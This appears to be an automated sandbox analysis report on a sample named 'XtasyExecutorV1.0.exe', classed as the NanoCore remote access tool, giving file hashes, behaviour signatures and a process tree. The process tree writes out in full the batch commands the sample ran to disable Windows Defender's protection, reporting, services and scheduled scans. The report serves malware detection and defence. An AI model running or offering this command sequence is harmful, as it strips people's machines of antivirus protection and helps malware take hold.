Analysis

  • max time kernel
    80s
  • max time network
    95s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    17-12-2024 19:36

General

  • Target

    XtasyExecutorV1.0.exe

  • Size

    203KB

  • MD5

    b8fb078ab0ff9ca107d79112a1a56255

  • SHA1

    cebcb36d55bb63688bd9ffbf7d372ba41b0e959e

  • SHA256

    2d73aa44284a435c2cc78b6a80a4326f42a28dfa598e5dfd20ba3f612afdcd37

  • SHA512

    1a817eb1043122eb183821558cd9541f4a34f76551f52040f8c2e3caf8dd082a88d80799be868bbb84fdf339cb462a63bb14bceae869345485b565a19d01f1f9

  • SSDEEP

    3072:AzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIseXxluxTkQ0yyMH+elFEGxdb8:ALV6Bta6dtJmakIM5NhkQl3EGrbmMZ3k

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Nanocore family
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Modifies Security services 2 TTPs 4 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\XtasyExecutorV1.0.exe
    "C:\Users\Admin\AppData\Local\Temp\XtasyExecutorV1.0.exe"
    1⤵
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\d7d62d2a.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2640
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2796
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2784
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2724
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:796
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2808
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:2616
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:2624
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:2632
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:2656
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • System Location Discovery: System Language Discovery
        PID:2684
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2732
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1852
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3068
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3064
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1940
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2452
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1648
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1324
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1268
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1704
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1652
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2052
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1064
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:588
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1720
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2956
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:2368
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:388
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:1148
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies Security services
        • System Location Discovery: System Language Discovery
        PID:1740
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        3⤵
        • Modifies security service
        • System Location Discovery: System Language Discovery
        PID:1788

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\d7d62d2a.bat

    Filesize

    3KB

    MD5

    10e9d7377b7fd4df43145ae4c8b136b3

    SHA1

    4002ba143ff336f631d36c6afd93464822ba541e

    SHA256

    1b1b51dbe669925f941f0b3e04c7d00f29af6746179a7b72a58391720cd23da1

    SHA512

    c28b439ab8fdc3e8da7217250b5f13be1613b0acf5677758d65fe7e46f0abdea08db73ecce5ca38fb88c8c25064fddc04e1f23d4d70058d27a0ba23a980fe885

  • memory/3044-0-0x0000000074C01000-0x0000000074C02000-memory.dmp

    Filesize

    4KB

  • memory/3044-1-0x0000000074C00000-0x00000000751AB000-memory.dmp

    Filesize

    5.7MB

  • memory/3044-2-0x0000000074C00000-0x00000000751AB000-memory.dmp

    Filesize

    5.7MB

  • memory/3044-8-0x0000000074C00000-0x00000000751AB000-memory.dmp

    Filesize

    5.7MB

  • memory/3044-9-0x0000000074C00000-0x00000000751AB000-memory.dmp

    Filesize

    5.7MB